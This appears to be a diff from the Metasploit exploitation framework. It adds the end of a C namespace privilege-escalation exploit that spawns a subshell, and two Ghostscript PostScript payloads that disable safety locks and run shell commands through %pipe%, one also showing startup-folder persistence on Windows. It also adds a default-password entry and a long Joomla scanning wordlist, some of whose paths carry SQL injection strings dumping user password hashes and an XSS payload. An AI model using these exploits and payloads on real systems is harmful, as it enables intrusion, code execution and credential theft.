+    execl(SUBSHELL, "", NULL);
+
+    dprintf("[-] executing subshell failed\n");
+  }
+
+  close(sync_pipe[0]);
+
+  if (read(sync_pipe[1], &dummy, 1) != 1) {
+    dprintf("[-] read from sock\n");
+    exit(EXIT_FAILURE);
+  }
+
+  char path[256];
+  sprintf(path, "/proc/%d/setgroups", (int)child);
+
+  if (write_file(path, "deny") == -1) {
+    dprintf("[-] denying setgroups failed\n");
+    exit(EXIT_FAILURE);
+  }
+
+  dprintf("[~] done, namespace sandbox set up\n");
+
+  dprintf("[.] mapping subordinate ids\n");
+  char subuid[64];
+  char subgid[64];
+
+  if (get_subuid(&subuid[0], sizeof(subuid))) {
+    dprintf("[-] couldn't find subuid map in /etc/subuid\n");
+    exit(EXIT_FAILURE);
+  }
+
+  if (get_subgid(&subgid[0], sizeof(subgid))) {
+    dprintf("[-] couldn't find subgid map in /etc/subgid\n");
+    exit(EXIT_FAILURE);
+  }
+
+  dprintf("[.] subuid: %s\n", subuid);
+  dprintf("[.] subgid: %s\n", subgid);
+
+  char cmd[256];
+
+  sprintf(cmd, "newuidmap %d 0 %s 1000", (int)child, subuid);
+  if (system(cmd))  {
+    dprintf("[-] newuidmap failed");
+    exit(EXIT_FAILURE);
+  }
+
+  sprintf(cmd, "newgidmap %d 0 %s 1000", (int)child, subgid);
+  if (system(cmd)) {
+    dprintf("[-] newgidmap failed");
+    exit(EXIT_FAILURE);
+  }
+
+  dprintf("[~] done, mapped subordinate ids\n");
+
+  dprintf("[.] executing subshell\n");
+
+  if (write(sync_pipe[1], "X", 1) != 1) {
+    dprintf("[-] write to sock");
+    exit(EXIT_FAILURE);
+  }
+
+  int status;
+  if (wait(&status) != child) {
+    dprintf("[-] wait");
+    exit(EXIT_FAILURE);
+  }
+
+  return 0;
+}
@@ -0,0 +1,9 @@
+%!PS
+userdict /setpagedevice undef
+a0
+currentpagedevice /HWResolution get 0 (metasploit) put
+{ grestore } stopped pop
+(ppmraw) selectdevice
+mark /OutputFile (%pipe%echo vulnerable > /dev/tty) currentdevice putdeviceprops
+{ showpage } stopped pop
+quit
@@ -0,0 +1,81 @@
+%!PS
+% This is ghostscript bug #699687 (split out from bug #699654)
+
+% ImageMagick define setpagedevice, just remove their definition. This doesn't
+% do anything if not using ImageMagick.
+userdict /setpagedevice undef
+
+% function to check if we're on Linux or Windows
+/iswindows {
+    % Just checking if paths contain drive
+    null (w) .tempfile closefile 1 get 16#3A eq
+} def
+
+% just select a papersize to initialize page device
+a0
+
+% The bug is that if you can make grestore or restore fail non-fatally,
+% LockSafetyParams isn't restored properly. grestore will fail if you set crazy
+% properties in your pagedevice, like a nonsense resolution.
+%
+% Normally it would be something like [72.0 72.0], but you can't just def
+% HWResolution to something else (for example), because it's readonly:
+%
+% GS>currentpagedevice wcheck ==
+% false
+%
+% But you can just put or astore into it, because the array itself is writable:
+% GS>currentpagedevice /HWResolution get wcheck ==
+% true
+%
+% Lets just put some junk in there.
+currentpagedevice /HWResolution get 0 (foobar) put
+
+% This grestore will fail, stopped just catches the error instead of aborting.
+{ grestore } stopped pop
+
+% Now LockSafetyParams will be incorrectly unset, you can check like this:
+% GS>mark currentdevice getdeviceprops .dicttomark /.LockSafetyParams get == pop
+% false
+
+% We can change and configure devices now, so make sure we're using one with
+% a OutputFile property.
+(ppmraw) selectdevice
+
+% Check if we're on Windows or UNIX
+iswindows {
+    % This is Windows, gswin32c.exe supports %pipe%, so you can just run calc.exe.
+    %
+    % The graphical version doesn't seem to support %pipe%, but you can create
+    % arbitrary files. If something is using the api (gs32dll.dll), it may or
+    % may not support %pipe%.
+
+    /getstartupdirwindows {
+        % This figures out startup location from %TEMP% (Tested on Win10)
+        (C:\\USERS\\XXXXXX~1\\STARTM~1\\PROGRAMS\\STARTUP\\)
+        dup 0 null (w) .tempfile closefile 0 18 getinterval putinterval
+    } def
+
+    % (directory) (extension) randfile (result)
+    /randfile {
+        % pick a random filename
+        exch rand 32 string cvs concatstrings exch concatstrings
+    } def
+
+    mark /OutputFile (%pipe%calc.exe) currentdevice putdeviceprops
+
+    % if you need to create files, use txtwrite like this:
+
+    %mark /OutputFile getstartupdirwindows (.bat) randfile
+    %   { (txtwrite) selectdevice } stopped pop putdeviceprops setdevice
+    %0 0 moveto
+    %(REM This is an exploit demo\n) show
+    %(calc.exe\n) show
+} {
+    % This is UNIX, just run a shell command
+    mark /OutputFile (%pipe%id) currentdevice putdeviceprops
+} ifelse
+
+{ showpage } stopped pop
+
+quit
@@ -14,10 +14,22 @@
 <%= normalize_platforms(items[:mod_platforms]) %>
 <% end %>

-## Reliability
+## Module Ranking

 <%= normalize_rank(items[:mod_rank]) %>

+## Side Effects
+
+<%= normalize_side_effects(items[:mod_side_effects]) %>
+
+## Reliability
+
+<%= normalize_reliability(items[:mod_reliability]) %>
+
+## Stability
+
+<%= normalize_stability(items[:mod_stability]) %>
+
 ## Related Pull Requests

 <%= normalize_pull_requests(items[:mod_pull_requests]) %>
@@ -0,0 +1,4 @@
+244+0000009999
+188+030000
+19b+00000F
+19b+000010
@@ -4,3 +4,4 @@ root
 Administrator
 USERID
 guest
+Admin
@@ -14,6 +14,7 @@ administrator/
 administrator/components/
 administrator/components/com_a6mambocredits/
 administrator/components/com_a6mambohelpdesk/
+administrator/components/com_admin/
 administrator/components/com_admin/admin.admin.html.php
 administrator/components/com_astatspro/refer.php
 administrator/components/com_bayesiannaivefilter/
@@ -38,7 +39,6 @@ administrator/components/com_joomlaradiov5/
 administrator/components/com_jpack/
 administrator/components/com_jreactions/
 administrator/components/com_juser/
-administrator/components/com_admin/
 administrator/components/com_kochsuite /
 administrator/components/com_linkdirectory/
 administrator/components/com_livechat/getSavedChatRooms.php
@@ -75,376 +75,1293 @@ component/osproperty/?task=agent_register
 component/quran/index.php?option=com_quran&action=viewayat&surano=
 components/com_ clickheat/
 components/com_5starhotels/
+components/com_ContentBlogList/
+components/com_Eventing/
+components/com_Fabrik/
 components/com_Jambook/jambook.php
+components/com_K2/
+components/com_Projectfork/
+components/com_a3000/
 components/com_a6mambocredits/
 components/com_a6mambohelpdesk/
+components/com_aardvertiser/
+components/com_ab/
 components/com_ab_gallery/
+components/com_abbrev/
+components/com_abc/
+components/com_abook/
+components/com_about/
+components/com_abstract/
 components/com_acajoom/
 components/com_acctexp/
+components/com_aceftp/
 components/com_aclassf/
+components/com_aclassfb/
+components/com_aclsfgpl/
+components/com_acmisc/
+components/com_acooldebate/
+components/com_acprojects/
+components/com_acstartseite/
+components/com_acteammember/
+components/com_actions/
 components/com_activities/
 components/com_actualite/
+components/com_acymailing/
+components/com_acysms/
+components/com_adagency/
+components/com_addproperty/
+components/com_addressbook/
+components/com_adds/
+components/com_admin/
 components/com_admin/admin.admin.html.php
+components/com_adsmanager/
 components/com_advancedpoll/
+components/com_advert/
+components/com_advertisementboard/
+components/com_advertising/
+components/com_affiliatetracker/
+components/com_agency/
+components/com_agenda/
 components/com_agora/
 components/com_agoragroup/
+components/com_aicontactsafe/
+components/com_airmonoblock/
+components/com_aist/
+components/com_ajax-shoutbox/
+components/com_ajax/
 components/com_ajaxchat/
+components/com_ajaxquiz/
+components/com_akeeba/
 components/com_akobook/
 components/com_akocomment/
 components/com_akogallery
+components/com_akogallery/
+components/com_alameda/
 components/com_alberghi/
+components/com_album/
+components/com_alert/
+components/com_alfcontact/
+components/com_alfresco/
+components/com_alfurqan/
+components/com_alfurqan15x/
+components/com_allcinevid/
 components/com_allhotels/
 components/com_alphacontent/
+components/com_alphauserpoints/
 components/com_altas/
+components/com_altauserpoints/
+components/com_amblog/
+components/com_aml_2/
 components/com_amocourse/
+components/com_annonces/
+components/com_annuaire/
+components/com_answers/
+components/com_appointinator/
+components/com_appointment/
+components/com_aprice/
+components/com_arcadegames/
+components/com_archeryscores/
+components/com_artforms/
 components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php
+components/com_article/
+components/com_articleman/
+components/com_articlemanager/
 components/com_articles/
 components/com_artist/
 components/com_artlinks/
+components/com_artportal/
+components/com_as/
 components/com_asortyment/
 components/com_astatspro/
+components/com_autartimonial/
+components/com_autartitarot/
+components/com_autostand/
+components/com_availcal/
+components/com_avosbillets/
+components/com_avreloaded/
+components/com_awd_song/
+components/com_awdwall/
 components/com_awesom/
+components/com_awiki/
+components/com_aysquiz/
+components/com_b2portfolio/
 components/com_babackup/
 components/com_banners/
 components/com_bayesiannaivefilter/
+components/com_bazaar/
+components/com_bbs/
+components/com_bca-rss-syndicator/
+components/com_be/
 components/com_be_it_easypartner/
 components/com_beamospetition/
+components/com_bearleague/
+components/com_beeheard/
+components/com_bfquiz_sqli/
+components/com_bfquiztrial/
+components/com_bfsurvey/
+components/com_bfsurvey_basic/
+components/com_bfsurvey_pro/
+components/com_bfsurvey_profree/
 components/com_biblestudy/
+components/com_biblioteca/
 components/com_biblioteca/views/biblioteca/tmpl/pdf.php?pag=1&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23
 components/com_biblioteca/views/biblioteca/tmpl/stampa.php?pag=1&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23
+components/com_bidding/
+components/com_biitatemplateshop/
+components/com_billyportfolio/
+components/com_biographies/
+components/com_bit/
 components/com_blog/
+components/com_blog_calendar/
+components/com_blogfactory/
+components/com_bnf/
+components/com_book/
 components/com_bookflip/
 components/com_bookjoomlas/
 components/com_booklibrary/
+components/com_booklibrary_1/
+components/com_bookmarks/
+components/com_bookpro/
 components/com_books/
+components/com_boss/
+components/com_br/
+components/com_breezingforms/
+components/com_brightweblinks/
 components/com_bsadv/
+components/com_bsq/
 components/com_bsq_sitestats/
 components/com_bsq_sitestats/external/rssfeed.php
 components/com_bsqsitestats/
+components/com_bt_media/
+components/com_bulkenquery/
+components/com_business/
+components/com_buslicense/
+components/com_ca/
+components/com_caddy/
+components/com_calcbuilder/
 components/com_calendar/
+components/com_calendario/
+components/com_calendarplanner/
 components/com_camelcitydb2/
+components/com_camp/
 components/com_candle/
+components/com_canteen/
+components/com_caproductprices/
+components/com_car/
+components/com_carman/
+components/com_cartikads/
+components/com_cartweberp/
+components/com_casino/
 components/com_casino_blackjack/
 components/com_casino_videopoker/
 components/com_casinobase/
+components/com_catalog/
 components/com_catalogproduction/
 components/com_catalogshop/
+components/com_catalogue/
 components/com_category/
+components/com_catfiltering/
+components/com_cb/
+components/com_cbcontact/
+components/com_cbe/
+components/com_cbresumebuilder/
+components/com_ccboard/
+components/com_ccinvoices/
+components/com_cckjseblod/
+components/com_ccnewsletter/
+components/com_cgtestimonial/
 components/com_cgtestimonial/video.php?url="><script>alert('xss');</script>
+components/com_checklist/
+components/com_chronoconnectivity/
+components/com_chronocontact/
 components/com_chronocontact/excelwriter/PPS/File.php
+components/com_cincopa/
 components/com_cinema/
+components/com_civicrm/
+components/com_cjlib/
+components/com_ckforms/
+components/com_clan/
+components/com_clan_members/
+components/com_clanlist/
+components/com_clantools/
 components/com_clasifier/
+components/com_classified/
 components/com_classifieds/
 components/com_clickheat/
 components/com_cloner/
+components/com_clubmanager/
 components/com_cmimarketplace/
+components/com_cmotour/
 components/com_cms/
+components/com_collector/
 components/com_colophon/
+components/com_color/
 components/com_colorlab/
+components/com_commedia/
+components/com_comments/
+components/com_community/
+components/com_communitypolls/
+components/com_communityquiz/
+components/com_communitysurveys/
+components/com_comp/
 components/com_competitions/
+components/com_component/
 components/com_comprofiler/
 components/com_comprofiler/plugin.class.php
+components/com_connect/
+components/com_contact/
+components/com_contact_enhanced/
+components/com_contactformmaker/
 components/com_contactinfo/
 components/com_content/
+components/com_contentbloglist/
+components/com_contenthistory/
+components/com_contentmap/
+components/com_controller/
+components/com_contushdvideoshare/
+components/com_convertforms/
+components/com_countries/
+components/com_coupon/
+components/com_cpeventcalendar/
+components/com_cpg/
 components/com_cpg/cpg.php
+components/com_creativecontactform/
+components/com_crhotels/
+components/com_cropimage/
 components/com_cropimage/admin.cropcanvas.php
+components/com_crowdsource/
 components/com_custompages/
+components/com_cvmaker/
+components/com_cwtags/
 components/com_cx/
+components/com_d-greinar/
 components/com_d3000/
 components/com_dadamail/
+components/com_dailymeals/
 components/com_dailymessage/
+components/com_dashboard/
+components/com_datafeeds/
+components/com_dateconverter/
 components/com_datsogallery/
 components/com_dbquery/
+components/com_dcnews/
+components/com_dcs_flashgames/
+components/com_delicious/
+components/com_departments/
 components/com_detail/
+components/com_dhforum/
+components/com_diary/
+components/com_digifolio/
 components/com_digistore/
+components/com_dioneformwizard/
+components/com_directorix/
 components/com_directory/
+components/com_dirfrm/
+components/com_discussions/
+components/com_dj-classifieds/
+components/com_djartgallery/
+components/com_djcatalog/
+components/com_djclassifieds/
 components/com_djiceshoutbox/
+components/com_dm_orders/
+components/com_dms/
 components/com_doc/
+components/com_docman/
+components/com_docmanpaypal/
+components/com_donateprocess/
+components/com_doqment/
+components/com_download-monitor/
 components/com_downloads/
+components/com_drawroot/
 components/com_ds-syndicate/
+components/com_dshop/
+components/com_dt-register/
+components/com_dtracker/
 components/com_dtregister/
+components/com_dv/
 components/com_dv/externals/phpupload/upload.php");
+components/com_dwgraphs/
+components/com_easy_youtube_gallery/
+components/com_easyblog/
 components/com_easybook/
+components/com_easydiscuss/
+components/com_easygb/
+components/com_ecommercewd/
+components/com_econtent/
+components/com_education/
+components/com_education_classes/
+components/com_ekrishta/
+components/com_elite/
+components/com_elite_experts/
 components/com_emcomposer/
+components/com_enmasse/
+components/com_ensenanzas/
+components/com_eportfolio/
+components/com_equipment/
 components/com_equotes/
+components/com_esearch/
+components/com_eshop/
+components/com_eslamiat/
 components/com_estateagent/
+components/com_event/
+components/com_eventbooking/
+components/com_eventcal/
 components/com_eventing/
+components/com_eventix/
 components/com_eventlist/
 components/com_events/
 components/com_ewriting/
+components/com_expautospro/
+components/com_expedition/
+components/com_expose/
 components/com_expose/uploadimg.php
+components/com_expose_small_rc4/
 components/com_expshop/
 components/com_extcalendar/
 components/com_extcalendar/cal_popup.php?extmode=view&extid=
 components/com_extcalendar/extcalendar.php
+components/com_extended/
 components/com_extended_registration/registration_detailed.inc.php
+components/com_extplorer-test1/
+components/com_extplorer-test2/
+components/com_extplorer-test3/
 components/com_extplorer/
+components/com_extrasearch/
+components/com_ezautos/
 components/com_ezine/
 components/com_ezstore/
+components/com_fabrik/
+components/com_facebook/
+components/com_facegallery/
 components/com_facileforms/
+components/com_family/
 components/com_fantasytournament/
 components/com_faq/
+components/com_faqbook/
+components/com_fastball/
+components/com_fbb/
+components/com_feederator/
 components/com_feederator/includes/tmsp/add_tmsp.php
+components/com_fields/
 components/com_filebase/
 components/com_filiale/
+components/com_finder/
+components/com_fireboard/
+components/com_firmy/
+components/com_flash/
 components/com_flashfun/
+components/com_flashgames/
 components/com_flashmagazinedeluxe/
+components/com_flexicontent/
 components/com_flippingbook/
+components/com_flipwall/
+components/com_flyspray/
 components/com_flyspray/startdown.php
+components/com_fm/
 components/com_fm/fm.install.php
+components/com_focalpoint/
 components/com_foevpartners/
+components/com_foobla/
+components/com_foobla_suggestions/
 components/com_football/
+components/com_forme/
+components/com_formmaker/
 components/com_formtool/
 components/com_forum/
+components/com_foto/
+components/com_foxcontact/
 components/com_fq/
+components/com_freichat/
+components/com_frontenduseraccess/
+components/com_fsave/
+components/com_fss/
+components/com_full/
 components/com_fundraiser/
+components/com_furniture/
+components/com_g2bridge/
+components/com_gadgetfactory/
 components/com_galeria/
+components/com_galleria/
 components/com_galleria/galleria.html.php
 components/com_gallery/
+components/com_gallery_wd/
+components/com_galleryxml/
+components/com_gambling/
 components/com_game/
 components/com_gameq/
+components/com_gamesbox/
+components/com_gameserver/
+components/com_ganalytics/
+components/com_gantry/
 components/com_garyscookbook/
+components/com_gbufacebook/
+components/com_gcalendar/
+components/com_gds/
 components/com_genealogy/
 components/com_geoboerse/
+components/com_geocontent/
+components/com_giftexchange/
 components/com_gigcal/
+components/com_gigfe/
+components/com_gk3_photoslide/
+components/com_gmap/
 components/com_gmaps/
+components/com_gnosis/
+components/com_golfcourseguid/
+components/com_golfcourseguide/
+components/com_google/
 components/com_googlebase/
+components/com_googlemaplocator/
+components/com_goverment/
+components/com_gpstools/
+components/com_graphics/
+components/com_grid/
+components/com_groovygallery/
+components/com_groupjive/
+components/com_groups/
 components/com_gsticketsystem/
+components/com_guesser/
 components/com_guide/
+components/com_guru/
+components/com_gurujibook/
+components/com_hashcash/
 components/com_hashcash/server.php
+components/com_hbooking/
 components/com_hbssearch/
+components/com_hdflvplayer/
+components/com_hdvideoshare/
+components/com_healthstats/
+components/com_hello/
 components/com_hello_world/
+components/com_helpdeskpro/
+components/com_hezacontent/
+components/com_hikasho/
+components/com_hmcommunity/
+components/com_horoscope/
+components/com_horses/
+components/com_hospital/
+components/com_hotbrackets/
+components/com_hotel/
+components/com_hotelguide/
 components/com_hotproperties/
 components/com_hotproperty/
 components/com_hotspots/
+components/com_hsconfig/
+components/com_htmlarea3/
 components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php
+components/com_huruhelpdesk/
 components/com_hwdvideoshare/
 components/com_hwdvideoshare/assets/uploads/flash/flash_upload.php?jqUploader=1");
+components/com_icagenda/
 components/com_ice/
 components/com_idoblog/
 components/com_idvnews/
+components/com_if_nexus/
+components/com_if_surfalert/
+components/com_igallery/
 components/com_ignitegallery/
+components/com_iigcatalog/
+components/com_ijoomla/
 components/com_ijoomla_archive/
 components/com_ijoomla_rss/
+components/com_imagebrowser/
+components/com_img/
+components/com_imoti/
+components/com_include/
+components/com_informations/
+components/com_inneradmission/
+components/com_installer/
 components/com_inter/
+components/com_intranet/
+components/com_intuit/
+components/com_invitex/
+components/com_iomezun/
 components/com_ionfiles/
+components/com_iproperty/
+components/com_ircmbasic/
 components/com_is/
+components/com_itarmory/
+components/com_items/
 components/com_ixxocart/
+components/com_j-projects/
 components/com_jabode/
+components/com_jacomment/
+components/com_jaextmanager/
+components/com_jajobboard/
+components/com_janews/
 components/com_jashowcase/
+components/com_javoice/
 components/com_jb2/
+components/com_jbcatalog/
+components/com_jbdiary/
+components/com_jbook/
+components/com_jbpeople/
+components/com_jbpublishdownfp/
+components/com_jbudgetsmagic/
+components/com_jbuildozer/
+components/com_jbusinessdirectory/
+components/com_jcafe/
+components/com_jcalpro/
+components/com_jcart/
 components/com_jce/
+components/com_jcollection/
+components/com_jcomments/
+components/com_jcommunity/
+components/com_jcruisereservation/
 components/com_jcs/
 components/com_jd-wiki/
 components/com_jd-wp/
+components/com_jdbexport/
+components/com_jdirectory/
+components/com_jdownloads/
+components/com_jdrugstopics/
+components/com_jeajaxeventcalendar/
+components/com_jeauction/
+components/com_jeauto/
+components/com_jeawdsong/
+components/com_jeclassifieds/
+components/com_jeclassifyads/
+components/com_jedirectory/
+components/com_jeemaarticlecollection/
+components/com_jeemasms/
+components/com_jeeventcalendar/
+components/com_jefaqpro/
+components/com_jeformcr/
+components/com_jegallery/
+components/com_jegridfolio/
+components/com_jeguestbook/
+components/com_jejob/
+components/com_jek2storymultipleform/
+components/com_jem/
+components/com_jembedall/
+components/com_jemediaplayer/
+components/com_jemembership/
+components/com_jemessenger/
+components/com_jepaypervideo/
+components/com_jepoll/
+components/com_jeportfolio/
+components/com_jepropertyfinder/
+components/com_jequestions/
+components/com_jequizmanagement/
+components/com_jequoteform/
+components/com_jereverseauction/
+components/com_jesectionfinder/
+components/com_jesubmit/
+components/com_jetext/
+components/com_jeticket/
+components/com_jetour/
+components/com_jeux/
+components/com_jevideogallery/
+components/com_jevideorate/
+components/com_jfbconnect/
+components/com_jfeedback/
+components/com_jfuploader/
+components/com_jfusion/
+components/com_jgen/
+components/com_jgive/
+components/com_jgrid/
+components/com_jhotelreservation/
+components/com_jigsaw/
 components/com_jim/
+components/com_jimtawl/
+components/com_jinc/
+components/com_jinventory/
 components/com_jjgallery/
+components/com_jlike/
+components/com_jlord_rss/
+components/com_jmarket/
 components/com_jmovies/
+components/com_jmsfileseller/
+components/com_jmsmusic/
+components/com_jnews/
+components/com_jnewsletter/
+components/com_jnewspaper/
+components/com_joaktree/
+components/com_job/
+components/com_jobads/
+components/com_jobgrokapp/
+components/com_jobgroklist/
 components/com_jobline/
+components/com_jobprofile/
+components/com_jofacebookgallery/
+components/com_joltcard/
 components/com_jombib/
+components/com_jomcomdev/
+components/com_jomdirectory/
+components/com_jomestate/
+components/com_jomholiday/
+components/com_jomres/
+components/com_jomtube/
 components/com_joobb/
+components/com_joodb/
 components/com_jooget/
 components/com_joom12pic/
+components/com_joomanager/
+components/com_joomblog/
+components/com_joomclip/
+components/com_joomdle/
+components/com_joomdoc/
+components/com_joomdocs/
+components/com_joomgalaxy/
+components/com_joomgallery&func/
+components/com_joomgallery/
+components/com_joominaflileselling/
 components/com_joomla-visites/
+components/com_joomla/
 components/com_joomla_flash_uploader/
 components/com_joomlaboard/
+components/com_joomlaconnect_be/
+components/com_joomladate/
 components/com_joomladate/ 
 components/com_joomlaflashfun/
+components/com_joomlaflickr/
 components/com_joomlalib/
+components/com_joomlapicasa2/
+components/com_joomlaquiz/
 components/com_joomlaradiov5/
+components/com_joomlaupdate/
+components/com_joomlaupdater/
 components/com_joomlavvz/
 components/com_joomlaxplorer/
 components/com_joomloads/
+components/com_joomloc/
+components/com_joomlub/
+components/com_joommail/
+components/com_joomnik/
+components/com_joomportfolio/
 components/com_joomradio/
+components/com_joomrecipe/
+components/com_joomsport/
+components/com_joomtouch/
 components/com_joomtracker/
+components/com_jooproperty/
 components/com_joovideo/
 components/com_jotloader/
 components/com_journal/
+components/com_jp_jobs/
 components/com_jpack/
 components/com_jpad/
+components/com_jphone/
+components/com_jphoto/
+components/com_jpodium/
+components/com_jprojectmanager/
+components/com_jquarks4s/
+components/com_jquickcontact/
+components/com_jr_tfb/
+components/com_jradio/
 components/com_jreactions/
+components/com_jresearch/
+components/com_jreservation/
+components/com_jreviews/
 components/com_jreviews/scripts/xajax.inc.php
+components/com_jsautoz/
+components/com_jscalendar/
+components/com_jshop/
+components/com_jsjobs/
+components/com_jsplocation/
+components/com_jsptickets/
+components/com_jssupportticket/
+components/com_jstore/
+components/com_jsubscription/
+components/com_jsupport/
+components/com_jtagcalendar /
+components/com_jtagcalendar/
+components/com_jtagmembersdirectory/
+components/com_jtagminicart/
+components/com_jticketing/
+components/com_jtickets/
+components/com_jtips/
+components/com_jtm/
+components/com_juicy/
+components/com_jukebox/
+components/com_juliaportfolio/
 components/com_jumi/
 components/com_juser/
+components/com_jux_eventon/
+components/com_jux_real_estate/
+components/com_jvcomment/
+components/com_jvehicles/
 components/com_jvideo/
+components/com_jvideoclip/
+components/com_jvideodirect/
+components/com_jvotesystem/
+components/com_jw_allvideos/
+components/com_jwhmcs/
+components/com_jwmmxtd/
 components/com_k2/
+components/com_k2ajaxsearch/
+components/com_k2store/
 components/com_kbase/
+components/com_king/
+components/com_kissgallery/
+components/com_kk/
+components/com_kkcontent/
+components/com_knowledgebase/
 components/com_knowledgebase/fckeditor/fckeditor.js
 components/com_kochsuite /
+components/com_kochsuite/
+components/com_komento/
+components/com_konsultasi/
+components/com_kp/
+components/com_ksadvertiser/
 components/com_kunena/
+components/com_kunena_google_map_no_geocode/
+components/com_lead/
+components/com_leader/
 components/com_letterman/
 components/com_lexikon/
+components/com_libros/
 components/com_linkdirectory/
+components/com_linkr/
+components/com_listbingo/
+components/com_listing/
 components/com_listoffreeads/
+components/com_livechat/
 components/com_livechat/getSavedChatRooms.php
 components/com_livechat/xmlhttp.php
 components/com_liveticker/
 components/com_lm/
 components/com_lmo/
+components/com_lms/
+components/com_lmsking/
+components/com_loginbox/
+components/com_loudmounth/
 components/com_loudmounth/includes/abbc/abbc.class.php
 components/com_loudmouth/
+components/com_lovefactory/
 components/com_lowcosthotels/
+components/com_lucygames/
+components/com_lurm/
 components/com_lurm_constructor/admin.lurm_constructor.php
+components/com_lyftenbloggie/
+components/com_macgallery/
+components/com_machine/
 components/com_mad4joomla/
+components/com_madeira/
 components/com_madeira/img.php
+components/com_magazine/
+components/com_magazine_3_0_1/
+components/com_magicdealsweb/
+components/com_maian15/
+components/com_maianmedia/
 components/com_maianmusic/
 components/com_mailarchive/
 components/com_mailto/
+components/com_mambatstaff/
 components/com_mambatstaff/mambatstaff.php
 components/com_mambelfish/
 components/com_mambospgm/
+components/com_mambowiki/
 components/com_mambowiki/MamboLogin.php
+components/com_manager/
+components/com_maplocator/
+components/com_maqmahelpdesk/
+components/com_market/
 components/com_marketplace/
+components/com_markt/
+components/com_masterforms/
+components/com_matamko/
 components/com_mcquiz/
 components/com_mdigg/
+components/com_media/
 components/com_media_library/
+components/com_mediaalert/
+components/com_medialibrary/
+components/com_mediamall/
 components/com_mediaslide/
+components/com_mediqna/
+components/com_memorix/
+components/com_memory/
+components/com_memorybook/
+components/com_menu/
 components/com_mezun/
 components/com_mgm/
 components/com_minibb/
 components/com_misterestate/
+components/com_mmp/
 components/com_mmp/help.mmp.php
+components/com_mmsblog/
+components/com_mochigames/
+components/com_mod_dvfoldercontent/
 components/com_model/
+components/com_modern_booking/
+components/com_mojo/
+components/com_monthlyarchive/
+components/com_moodle/
 components/com_moodle/moodle.php
 components/com_moofaq/
+components/com_morfeoshow/
+components/com_mosets/
+components/com_mosforms/
 components/com_mosmedia/
+components/com_mospray/
 components/com_mospray/scripts/admin.php
 components/com_mosres/
 components/com_most/
+components/com_mostwantedrealestate/
+components/com_motor/
+components/com_movm/
+components/com_mp3/
 components/com_mp3_allopass/
+components/com_mscomment/
+components/com_mtfireeagle/
 components/com_mtree/
 components/com_mtree/img/listings/o/{id}.php
+components/com_mtree/img/listings/o/{id}.php where {id}
+components/com_multibanners/
 components/com_multibanners/extadminmenus.class.php
+components/com_multimap/
+components/com_multiroot/
+components/com_multitier/
+components/com_muscol/
+components/com_music/
+components/com_musicgallery/
+components/com_mv_restaurantmenumanager/
 components/com_myalbum/
+components/com_myblog/
+components/com_mycar/
 components/com_mycontent/
 components/com_mydyngallery/
+components/com_myfiles/
+components/com_myform/
 components/com_mygallery/
+components/com_myhome/
+components/com_mymsg/
+components/com_myportfolio/
+components/com_myproject/
+components/com_mysms/
+components/com_mytube/
 components/com_n-forms/
+components/com_na/
 components/com_na_content/
 components/com_na_mydocs/
 components/com_na_newsdescription/
 components/com_na_qforms/
+components/com_nbreal/
 components/com_neogallery/
 components/com_neorecruit/
 components/com_neoreferences/
 components/com_netinvoice/
+components/com_network/
 components/com_news/
 components/com_news_portal/
+components/com_newsfeeds/
 components/com_newsflash/
+components/com_newssearch/
+components/com_nfn/
 components/com_nfn_addressbook/
+components/com_nfnaddressbook/
+components/com_nge/
+components/com_niceajaxpoll/
 components/com_nicetalk/
+components/com_ninjamonial/
+components/com_ninjamonials/
+components/com_nkc/
+components/com_noticeboard/
+components/com_noticia/
 components/com_noticias/
+components/com_novasfh/
+components/com_ns_downloadshop/
+components/com_ob/
+components/com_obSuggest/
+components/com_obsuggest/
+components/com_odudeprofile/
 components/com_omnirealestate/
 components/com_omphotogallery/
+components/com_onevote/
+components/com_ongallery/
 components/com_ongumatimesheet20/
+components/com_onismusic /
+components/com_onismusic/
+components/com_onispetitions/
+components/com_onisquotes/
+components/com_onlineexam/
 components/com_onlineflashquiz/
+components/com_opencart/
+components/com_oprykningspoint_mc/
+components/com_ops/
+components/com_org/
+components/com_orgchart/
+components/com_ornekek/
+components/com_os_cck/
+components/com_osdownloads/
+components/com_osproperty/
+components/com_osservicesbooking/
+components/com_otzivi/
 components/com_ownbiblio/
+components/com_oziogallery/
+components/com_oziogallery2/
+components/com_packages/
+components/com_pandafminigames/
 components/com_panoramic/
+components/com_parcoauto/
+components/com_party/
 components/com_paxgallery/
 components/com_paxxgallery/
+components/com_payage/
+components/com_payplans/
+components/com_pazzari_vm3/
+components/com_pbbooking/
+components/com_pc/
 components/com_pcchess/
 components/com_pcchess/include.pcchess.php
 components/com_pccookbook/
 components/com_pccookbook/pccookbook.php
+components/com_people/
+components/com_peoplebook/
 components/com_peoplebook/param.peoplebook.php
+components/com_perchagallery/
+components/com_perchaimageattach/
 components/com_performs/
+components/com_personal/
 components/com_philaform/
 components/com_phocadocumentation/
+components/com_phocadownload/
+components/com_phocagallery/
+components/com_phocamaps/
+components/com_photo/
+components/com_photobattle/
+components/com_photoblog/
+components/com_photocontest/
+components/com_photomapgallery/
 components/com_php/
+components/com_phpbridge/
+components/com_phpshop/
 components/com_phpshop/toolbar.phpshop.html.php
+components/com_picasa2gallery/
+components/com_picsell/
 components/com_pinboard/
 components/com_pms/
+components/com_pofos/
 components/com_poll/
 components/com_pollxt/
 components/com_ponygallery/
 components/com_portafolio/
 components/com_portfol/
+components/com_portfolio/
+components/com_portfoliogallery/
+components/com_poweradmin/
+components/com_powermail/
 components/com_prayercenter/
+components/com_press/
+components/com_pressrelease/
+components/com_preventive/
+components/com_price_alert/
+components/com_prime/
+components/com_pro/
 components/com_pro_desk/
 components/com_prod/
+components/com_product/
+components/com_product_modul/
+components/com_productbook/
+components/com_products/
 components/com_productshowcase/
+components/com_profile/
 components/com_profiler/
 components/com_projectfork/
+components/com_projectlog/
+components/com_projects/
+components/com_proofreader/
+components/com_properties/
 components/com_propertylab/
 components/com_puarcade/
 components/com_publication/
+components/com_publisher/
+components/com_qcontacts/
+components/com_qpersonel/
+components/com_question/
+components/com_quickfaq/
+components/com_quicknews/
 components/com_quiz/
+components/com_quran/
+components/com_races/
+components/com_radio/
+components/com_rand/
+components/com_ranking/
 components/com_rapidrecipe/
+components/com_rd_download/
 components/com_rdautos/
 components/com_realestatemanager/
+components/com_realpin/
+components/com_realtyna/
+components/com_recerca/
+components/com_recipe/
 components/com_recly/
+components/com_record/
